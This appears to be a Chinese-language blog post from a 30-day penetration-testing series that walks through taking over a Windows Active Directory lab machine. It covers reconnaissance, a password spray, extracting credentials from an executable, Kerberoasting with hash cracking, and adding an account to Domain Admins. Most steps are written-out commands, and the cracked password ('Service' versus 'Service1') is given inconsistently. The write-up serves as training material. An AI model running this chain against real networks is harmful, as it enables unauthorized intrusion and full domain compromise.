iT邦幫忙

2025 iThome 鐵人賽

DAY 26
0

偵查

nmap -sC -sV -p- <ip>

掃描結果:

  • 53/tcp DNS
  • 80/tcp HTTP(Microsoft IIS 10.0)
  • 88/tcp Kerberos
  • 389/tcp LDAP
  • 445/tcp SMB
  • 5985/tcp WinRM
  • 3389/tcp RDP

確定這是一台屬於 nagoya-industries.com 網域的 Windows Server。

  1. 網頁探索
dirsearch http://<ip>/

找到 /team 頁面,裡面列出員工名單。推測帳號格式為 Firstname.Lastname。
建立 user.txt 並準備進行帳號爆破。

  1. SMB 枚舉
smbclient -N -L \\\\<ip>\\

匿名登入成功,但共享內容受限。
enum4linux 顯示:

  • 網域 SID:S-1-5-21-1969309164-1513403977-1686805993
  • 網域名稱:NAGOYA-IND
  • 幾乎所有操作都被拒絕,需有效帳號登入。
  • 密碼猜測(Password Spray)
  • 利用提示「季節 + 年份」:
crackmapexec smb <ip> -u user.txt -p "Summer2023" --shares

成功取得帳密:

Fiona.Clark:Summer2023

  1. SMB 登入與檔案分析

登入共享資料夾:

smbclient //<ip>/SYSVOL -U "nagoya-industries.com\Fiona.Clark%Summer2023"

下載全部內容,發現:

SYSVOL/nagoya-industries.com/scripts/ResetPassword/
ResetPassword.exe
ResetPassword.exe.config
System.Security.*.dll

同時在 NETLOGON 也有同樣資料夾,顯然是自動部署腳本。
反編譯程式取得新憑證
使用 strings -e l ResetPassword.exe 從執行檔中讀取字串,成功找到憑證:
svc_helpdesk:U299iYRmikYTHDbPbxPoYYfa2j4x4cdg
4. Kerberoasting

使用 svc_helpdesk 登入進行 Kerberoast:

impacket-GetUserSPNs nagoya-industries.com/svc_helpdesk:U299iYRmikYTHDbPbxPoYYfa2j4x4cdg -dc-ip <ip> -request

取得兩組服務帳號的 TGS Hash:

  • svc_helpdesk
  • svc_mssql

用 Hashcat 嘗試破解:

hashcat -m 13100 -a 0 mssql.hash /usr/share/wordlists/rockyou.txt

成功得到:
svc_mssql:Service

RPC 列舉與群組分析

rpcclient -U "nagoya-industries.com\\svc_mssql" 192.168.122.21
rpcclient $> enumdomgroups
rpcclient $> querygroupmem 0x200

結果顯示:

  • Domain Admins:只有 Administrator
  • developers 群組包含 Christopher.Lewis
  • helpdesk 群組包含 svc_helpdesk
  • svc_mssql 為 Domain Users 成員
  1. BloodHound 分析

使用 BloodHound 進行完整枚舉:

bloodhound-python -u svc_mssql -p Service1 -d nagoya-industries.com -gc 192.168.122.21 -c all

分析路徑後發現:

  • svc_mssql 對 Domain Admins 擁有 GenericAll 權限
  • 可利用權限修改群組成員,加入 Domain Admins
  1. 權限提升(Privilege Escalation)
net rpc group addmem "Domain Admins" svc_mssql -U "nagoya-industries.com\\svc_mssql%Service1" -S 192.168.122.21

驗證權限後,svc_mssql 已屬於 Domain Admins。
7. 取得完整控制權

登入 RDP:

xfreerdp /u:svc_mssql /p:Service1 /v:192.168.122.21

或利用 WinRM:

evil-winrm -i 192.168.122.21 -u svc_mssql -p Service1

成功進入系統後,確認具備系統管理員權限。


上一篇
Day 25. Vault
系列文
滲透測試 30 天:從基礎到實戰26
圖片
  熱門推薦
圖片
{{ item.channelVendor }} | {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言